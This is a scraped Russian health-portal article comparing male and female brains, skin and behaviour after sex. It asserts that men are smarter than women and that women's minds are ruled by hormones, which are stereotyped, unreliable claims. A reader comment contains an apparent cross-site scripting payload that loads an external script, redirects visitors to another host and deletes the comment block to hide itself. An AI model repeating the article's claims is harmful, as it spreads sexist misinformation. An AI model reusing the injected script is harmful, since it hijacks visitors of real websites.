Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ум или секс? Женщины прот...  >>  Ум или секс? Женщины против мужчин?
 
Обратная связь
 

Ум или секс? Женщины против мужчин?

Размер шрифта
21 ноября 2011 11:20
  • google_analytics: false
  • Нравится

Кто умнее: мужчина или женщина? Что важнее: сам секс или поведение после секса? Чем отличается женщина от мужчины?

Чем отличается мужской мозг от женского?

  1. Прежде всего, мужской мозг больше весит. Объем женского мозга – примерно полтора килограмма. Объем мужского больше на 200 г.

  2. Женский мозг – «игрушка для гормонов». В первую фазу менструального цикла у женщины всплеск гормонов: она чувствует себя красивой, настроение прекрасное, ей хочется жить и радоваться жизни. Во вторую фазу менструального цикла половые гормоны сходят на «нет». Женщина не нравится себе, ее все раздражает, ни на одной мысли она не в силах сосредоточиться.

  3. У мужчины нет таких приливов и отливов. Тестостерон – гормон спокойный, и мужчина всегда находится примерно в одном настроении. Он уравновешен и способен принимать решения на холодную голову.

  4. Мужчина способен удержать в голове несколько тем одновременно.

Так что все-таки мужчина умнее женщины. Даже если не всматриваться в детали, достаточно вспомнить один факт: среди лауреатов Нобелевской премии женщин почти нет.

Чем мужская кожа отличается от женской?

  1. По количеству коллагена. В мужской коже коллагена больше, она более упругая и эластичная, и поэтому внешне мужчина стареет позже.

  2. По количеству сальных желез. Тестостерон, мужской половой гормон, заставляет сальные железы работать активнее. Они выделяют больше кожного сала, которое смешивается с потом и образует водно-жировую эмульсию. Эта эмульсия – лучший природный крем для увлажнения кожи. И у мужчин его больше.

  3. По частоте отшелушивания. Каждые 2-3 дня мужчина бреется, снимая вместе с волосками ороговевшие клетки кожи, предотвращая тем самым закупоривание пор.

Выходит, что у мужчин кожа лучше, чем у женщин.

Чем отличается сексуальное поведение мужчины от сексуального поведения женщин?

После оргазма мужа клонит в сон: гормонов в его организме настолько много, что мозг в буквальном смысле сначала «взрывается», а затем отключается.

У женщины гормональный всплеск не настолько мощный. И после секса у нее совсем другое настроение: тянет поговорить, хочется приласкаться. В эти минуты в ней просыпаются материнские инстинкты. Обижаться на заснувшего мужа не стоит. Лучше попытаться понять, что мы настолько разные как раз для того, чтобы дополнять друг друга, а не отдаляться.

Видеосюжеты по теме: 

Мужчины и женщины. Почему мы такие разные?

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Перезапусти свои гормоны   Диагностика при гормональных нарушениях   Как секс избавит вас от врачей   Гормон секса не даст вам наесться!  
25 февраля 2013Теперь при приеме на работу вы должны будете плюнуть 17 июня 2013Мужской гормон страсти повышается, когда он выигрывает в игру!
 
17 октября 2012Гормон оргазма поможет прочесть мысли 02 сентября 2011Гормоны влияют на выбор профессии у женщин
 

Слайдшоу

1
Гормональный сбой: симптомы и лечение
Вся правда о тестостероне
Лучшие друзья девушки – это эстрогены

Тесты

1
Есть ли у вас гормональные нарушения
Как подобрать контрацептивы?
Как облегчить менопаузу?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.